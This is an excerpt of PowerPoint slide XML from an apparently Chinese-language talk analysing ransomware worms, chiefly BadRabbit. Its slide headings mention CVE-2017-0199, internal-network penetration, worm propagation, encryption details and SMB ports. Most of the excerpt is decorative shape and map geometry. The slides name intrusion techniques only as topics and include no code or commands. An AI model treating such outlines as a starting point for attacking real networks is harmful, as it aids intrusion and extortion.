              <a:t>传播还用到了Office 0day（如：CVE-2017-0199）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="989330" lvl="1" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>直接就可以打进内网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几个关键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几个关键点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="蠕虫传播路径😃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蠕虫传播路径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😃</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>内网渗透技巧细节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😀</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>勒索加密细节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🙂</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>135/139/445这些端口区别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🙃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0" build="p" bldLvl="5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猥琐钓鱼植入的 BadRabb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猥琐钓鱼植入的</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>BadRabbit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277803" y="3202935"/>
            <a:ext cx="2273916" cy="2245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9" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750199" y="2818711"/>
            <a:ext cx="1277847" cy="1262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0" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880271" y="5764971"/>
            <a:ext cx="1277847" cy="1262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1" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8841372" y="3694816"/>
            <a:ext cx="1277847" cy="1262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油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872666" y="5838158"/>
            <a:ext cx="871681" cy="860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3" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9044455" y="2521129"/>
            <a:ext cx="871681" cy="860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经典画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经典画面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366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6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4400" y="2889250"/>
            <a:ext cx="8636000" cy="5981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特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特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="2017.10.12爆发，又是首发乌克兰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2017.10.12爆发，又是首发乌克兰</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>这次没用到永恒之蓝，除了内外渗透技巧外，还用到了猥琐钓鱼植入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钓鱼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钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373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7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3278" y="2008649"/>
            <a:ext cx="11538244" cy="7742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直接看这张图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直接看这张图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377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7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4400" y="2032000"/>
            <a:ext cx="8636000" cy="7696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下一步如何进化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下一步如何进化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277803" y="3202935"/>
            <a:ext cx="2273916" cy="2245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2" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750199" y="2818711"/>
            <a:ext cx="1277847" cy="1262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3" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880271" y="5764971"/>
            <a:ext cx="1277847" cy="1262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4" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8841372" y="3694816"/>
            <a:ext cx="1277847" cy="1262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5" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872666" y="5838158"/>
            <a:ext cx="871681" cy="860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6" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9044455" y="2521129"/>
            <a:ext cx="871681" cy="860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65" h="21541" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="18778" y="6"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17680" y="134"/>
                  <a:pt x="17057" y="2145"/>
                  <a:pt x="17057" y="2145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16852" y="3359"/>
                  <a:pt x="15985" y="3890"/>
                  <a:pt x="15481" y="4101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14194" y="4297"/>
                  <a:pt x="13397" y="3507"/>
                  <a:pt x="13053" y="1869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12537" y="2880"/>
                  <a:pt x="11654" y="3375"/>
                  <a:pt x="10752" y="3375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10038" y="3375"/>
                  <a:pt x="9410" y="2981"/>
                  <a:pt x="9042" y="2385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9027" y="2364"/>
                  <a:pt x="9047" y="2392"/>
                  <a:pt x="9027" y="2365"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8712" y="1939"/>
                  <a:pt x="8495" y="1267"/>
                  <a:pt x="8495" y="1267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8387" y="975"/>
                  <a:pt x="8079" y="832"/>
                  <a:pt x="7808" y="949"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7536" y="1065"/>
                  <a:pt x="7403" y="1396"/>
                  <a:pt x="7512" y="1688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7512" y="1688"/>
                  <a:pt x="8063" y="2709"/>
                  <a:pt x="7926" y="3310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7837" y="3703"/>
                  <a:pt x="7904" y="4946"/>
                  <a:pt x="6218" y="5135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5752" y="5188"/>
                  <a:pt x="5327" y="4932"/>
                  <a:pt x="5018" y="4604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5009" y="4602"/>
                  <a:pt x="5000" y="4602"/>
                  <a:pt x="4991" y="4600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5214" y="6253"/>
                  <a:pt x="4846" y="7549"/>
                  <a:pt x="3835" y="8175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3057" y="8564"/>
                  <a:pt x="1662" y="8170"/>
                  <a:pt x="1662" y="8170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1662" y="8170"/>
                  <a:pt x="3252" y="9037"/>
                  <a:pt x="3447" y="9405"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3642" y="9774"/>
                  <a:pt x="3739" y="10487"/>
                  <a:pt x="3611" y="11024"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3469" y="11466"/>
                  <a:pt x="3110" y="11975"/>
                  <a:pt x="2194" y="11735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2194" y="11735"/>
                  <a:pt x="-293" y="11137"/>
                  <a:pt x="29" y="13686"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="13686"/>
                  <a:pt x="572" y="16056"/>
                  <a:pt x="2540" y="14422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3229" y="13850"/>
                  <a:pt x="3466" y="13680"/>
                  <a:pt x="3758" y="13817"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4891" y="14598"/>
                  <a:pt x="5317" y="15680"/>
                  <a:pt x="4758" y="17390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7376" y="16540"/>
                  <a:pt x="8461" y="17351"/>
                  <a:pt x="8474" y="18455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8487" y="19560"/>
                  <a:pt x="8015" y="19973"/>
                  <a:pt x="8015" y="19973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7078" y="21279"/>
                  <a:pt x="8131" y="21539"/>
                  <a:pt x="8131" y="21539"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8923" y="21597"/>
                  <a:pt x="8788" y="20282"/>
                  <a:pt x="8788" y="20282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8765" y="19731"/>
                  <a:pt x="8951" y="18719"/>
                  <a:pt x="9193" y="18402"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9719" y="17713"/>
                  <a:pt x="12920" y="16968"/>
                  <a:pt x="13661" y="20186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13940" y="17526"/>
                  <a:pt x="16095" y="16040"/>
                  <a:pt x="16894" y="17208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17606" y="18250"/>
                  <a:pt x="17592" y="18779"/>
                  <a:pt x="18341" y="19048"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18817" y="19219"/>
                  <a:pt x="19267" y="18578"/>
                  <a:pt x="19121" y="18094"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18976" y="17610"/>
                  <a:pt x="18406" y="17609"/>
                  <a:pt x="17445" y="16640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16491" y="15680"/>
                  <a:pt x="17449" y="12361"/>
                  <a:pt x="18805" y="12812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19049" y="12893"/>
                  <a:pt x="19141" y="12986"/>
                  <a:pt x="19373" y="13014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19605" y="13043"/>
                  <a:pt x="19842" y="12954"/>
                  <a:pt x="19868" y="12752"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19895" y="12550"/>
                  <a:pt x="19769" y="12416"/>
                  <a:pt x="19498" y="12345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19278" y="12287"/>
                  <a:pt x="19167" y="12369"/>
                  <a:pt x="18803" y="12220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17193" y="11564"/>
                  <a:pt x="17586" y="8705"/>
                  <a:pt x="19810" y="7865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17967" y="7771"/>
                  <a:pt x="16765" y="6843"/>
                  <a:pt x="16623" y="5495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16548" y="3927"/>
                  <a:pt x="18428" y="3479"/>
                  <a:pt x="18428" y="3479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21307" y="2438"/>
                  <a:pt x="19943" y="558"/>
                  <a:pt x="19943" y="558"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19603" y="206"/>
                  <a:pt x="19290" y="41"/>
                  <a:pt x="19004" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18927" y="-3"/>
                  <a:pt x="18851" y="-2"/>
                  <a:pt x="18778" y="6"/>
                </a:cubicBez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罗宾逊世界地图"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480117" y="1836985"/>
            <a:ext cx="12044567" cy="6079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51" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9427" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9246" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9110" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9095" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9168" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9100" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9048" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8976" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8862" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8831" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8716" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8603" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8504" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8504" y="193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8448" y="193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8287" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8240" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8328" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8297" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8137" y="411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7965" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8012" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8167" y="565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8085" y="565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7970" y="603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8012" y="667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8146" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8255" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8339" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8427" y="757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8410" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8448" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8462" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8474" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8488" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8417" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8443" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8488" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8572" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8495" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8452" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8422" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8405" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8448" y="1437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8495" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8577" y="1364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8551" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8448" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8370" y="1681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8391" y="1723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354" y="1816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8396" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8380" y="2031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8384" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8436" y="2259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8448" y="2381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8478" y="2442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8577" y="2451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8629" y="2544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8702" y="2544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8742" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8780" y="2320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8780" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8872" y="2124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8909" y="2041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8919" y="1960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8971" y="1887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9044" y="1858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9110" y="1826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9142" y="1826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9251" y="1745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9333" y="1620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9385" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9432" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9567" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9701" y="1447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9826" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9769" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9654" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9712" y="1271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9706" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9753" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9857" y="1283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9852" y="1190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9805" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9748" y="1097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9774" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9852" y="1117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9857" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9816" y="995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9873" y="995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9934" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9951" y="934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9908" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9955" y="789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9934" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10007" y="603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10069" y="603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10028" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10038" y="430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080" y="359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10132" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10049" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10168" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10193" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10349" y="193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10334" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10224" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10043" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9946" y="205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9991" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9965" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9887" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9784" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9654" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9640" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9836" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9976" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10049" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9836" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9551" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8193" y="29"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8085" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8069" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7960" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7887" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7835" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7779" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7753" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7711" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7639" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7562" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7515" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7452" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7468" y="193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7477" y="225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7659" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7737" y="266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7659" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7633" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7555" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7390" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7458" y="542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7348" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7328" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7244" y="603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7225" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7296" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7348" y="677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7473" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7567" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7711" y="594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7644" y="603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7649" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7717" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7758" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7831" y="481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7882" y="449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7878" y="398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7913" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7866" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7986" y="359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8022" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8106" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8203" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8276" y="225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8391" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8313" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8448" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8556" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8566" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8509" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8436" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8344" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8271" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8193" y="29"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7296" y="193"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7303" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7256" y="225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7157" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7251" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7199" y="472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7270" y="481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7343" y="472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7458" y="398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7499" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7503" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7452" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7385" y="193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7296" y="193"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14344" y="193"/>
                </a:moveTo>
                <a:lnTo>
